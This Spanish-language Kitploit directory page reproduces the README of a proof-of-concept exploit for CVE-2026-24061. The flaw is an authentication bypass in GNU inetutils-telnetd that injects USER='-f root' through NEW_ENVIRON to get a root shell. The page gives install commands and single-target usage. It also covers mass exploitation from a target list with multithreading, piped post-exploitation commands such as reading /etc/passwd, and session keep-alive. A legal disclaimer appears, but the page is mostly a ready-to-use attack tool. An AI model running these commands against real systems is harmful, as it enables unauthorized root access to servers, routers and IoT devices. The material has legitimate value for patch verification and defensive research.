Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-24061-PoC-Exploit — Exploit de omisión de autenticación remota para GNU inetutils-telnetd (CVE-2026-24061) que utiliza inyección CRLF para obtener una shell root instantánea. Admite explotación individual/masiva, multihilo, puertos personalizados, modo pipe y mantenimiento de sesión activa. | Kitploit
Herramientas/GitHubGitHub/tc4dy/cve-2026-24061-poc-exploit
Análisis de VulnerabilidadesExplotaciónPruebas de PenetraciónComando y ControlHerramienta de Acceso RemotoDesarrollo de Payloads
GitHubtc4dy/cve-2026-24061-poc-exploit

CVE-2026-24061-PoC-Exploit

Exploit de omisión de autenticación remota para GNU inetutils-telnetd (CVE-2026-24061) que utiliza inyección CRLF para obtener una shell root instantánea. Admite explotación individual/masiva, multihilo, puertos personalizados, modo pipe y mantenimiento de sesión activa.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
6hace 2 mesesAún no revisado

CVE-2026-24061

🚀 CVE-2026-24061 - Exploit de omisión de autenticación de GNU inetutils-telnetd

Python Bash License CVSS

Edición GNU inetutils-telnetd - Inyección CRLF para omisión de autenticación y shell root instantánea

📌 Resumen

Este exploit aprovecha CVE-2026-24061, una vulnerabilidad crítica de omisión de autenticación remota en GNU inetutils-telnetd. Al inyectar una carga útil NEW_ENVIRON manipulada con USER='-f root', omite la autenticación y otorga una shell root instantánea sin necesidad de credenciales.

Nota: El script basic_exploit.sh es una versión simplificada y más rápida de exploit.sh; sin embargo, se recomienda exploit.sh para disfrutar de toda la funcionalidad.

🔥 Características principales

🎯 Versiones vulnerables

ProductoVersiones
GNU inetutils-telnetd1.9.3 - 2.7
Distribuciones Linux afectadasDebian, CentOS, Ubuntu y sus distribuciones. (Zorin OS, Linux Mint, Pop!_OS y Elementary OS)
Dispositivos integradosNAS, IoT, Routers

⚠️ Aviso legal: Esta herramienta es únicamente para pruebas de seguridad autorizadas y fines educativos. El acceso no autorizado es ilegal.

📦 Instalación

root@kitploit:~
# Clone the repository
git clone https://github.com/tc4dy/CVE-2026-24061-PoC-Exploit
cd CVE-2026-24061-PoC-Exploit

# Python version
pip3 install -r requirements.txt

# Bash version
chmod +x exploit.sh
chmod +x basic_exploit.sh

🛠️ Ejemplos de uso

🎯 Explotación de un solo objetivo

root@kitploit:~
# Python version
python3 exploit.py -u 192.168.1.100

# Bash version
./exploit.sh -u 192.168.1.100
./basic_exploit.sh 192.168.1.100

🔧 Puerto y usuario personalizados

root@kitploit:~
# Custom port (non-standard telnet port)
python3 exploit.py -u 10.0.0.5 -p 2323

# Custom username injection
python3 exploit.py -u 10.0.0.5 -usr admin

📊 Explotación masiva (múltiples objetivos)

root@kitploit:~
# Create targets file
echo "192.168.1.100" > targets.txt
echo "192.168.1.101" >> targets.txt
echo "10.0.0.5:2323" >> targets.txt

# Mass exploit with 20 threads
python3 exploit.py -l targets.txt -m 20

# Bash version
./exploit.sh -l targets.txt -m 20

📡 Modo pipe (ejecución de comandos)

root@kitploit:~
# Execute commands via pipe
echo "id; whoami; uname -a" | python3 exploit.py -u 192.168.1.100

# Multiple commands
echo "ls -la; cat /etc/passwd; ps aux" | ./exploit.sh -u 192.168.1.100

⚙️ Opciones avanzadas

root@kitploit:~
# Verbose mode with debug output
python3 exploit.py -u 192.168.1.100 -v

# Custom timeout and retries
python3 exploit.py -u 192.168.1.100 --timeout 10 --retries 5

# Session keep-alive (maintain shell)
python3 exploit.py -u 192.168.1.100 --keep-alive

📊 Argumentos de línea de comandos

🔗 Exploits relacionados

Consulta mis otros repositorios de exploits:

  • CVE-2026-41940
  • CVE-2026-0073
  • CVE-2026-29000
Descargar herramienta
CategoríaCaracterísticas
Explotación✅ Omisión de autenticación mediante inyección CRLF
✅ Shell root instantánea
✅ Inyección de usuario personalizado (-f admin, -f user)
Escaneo✅ Explotación de un solo objetivo
✅ Explotación masiva desde archivo
✅ Multihilo (hilos configurables)
✅ Soporte de puertos personalizados
Avanzado✅ Modo pipe (ejecución de comandos mediante stdin)
✅ Mantenimiento de sesión activa
✅ Mecanismo de reintentos
✅ Control de tiempo de espera
Usabilidad✅ Salida con colores (colorama)
✅ Doble lenguaje (Python y Bash)
✅ Modo verboso/depuración
CortoLargoDescripciónPor defecto
-u--urlDirección IP del objetivoObligatorio
-p--portPuerto del objetivo23
-l--listArchivo con la lista de objetivosNinguno
-m--max-threadsMáximo de hilos para explotación masiva10
-usr--usernameUsuario a inyectarroot
-t--timeoutTiempo de espera del socket (segundos)10
-r--retriesNúmero de reintentos3
-v--verboseHabilitar salida de depuraciónFalso
--keep-aliveMantener la sesión activa después de la explotaciónFalso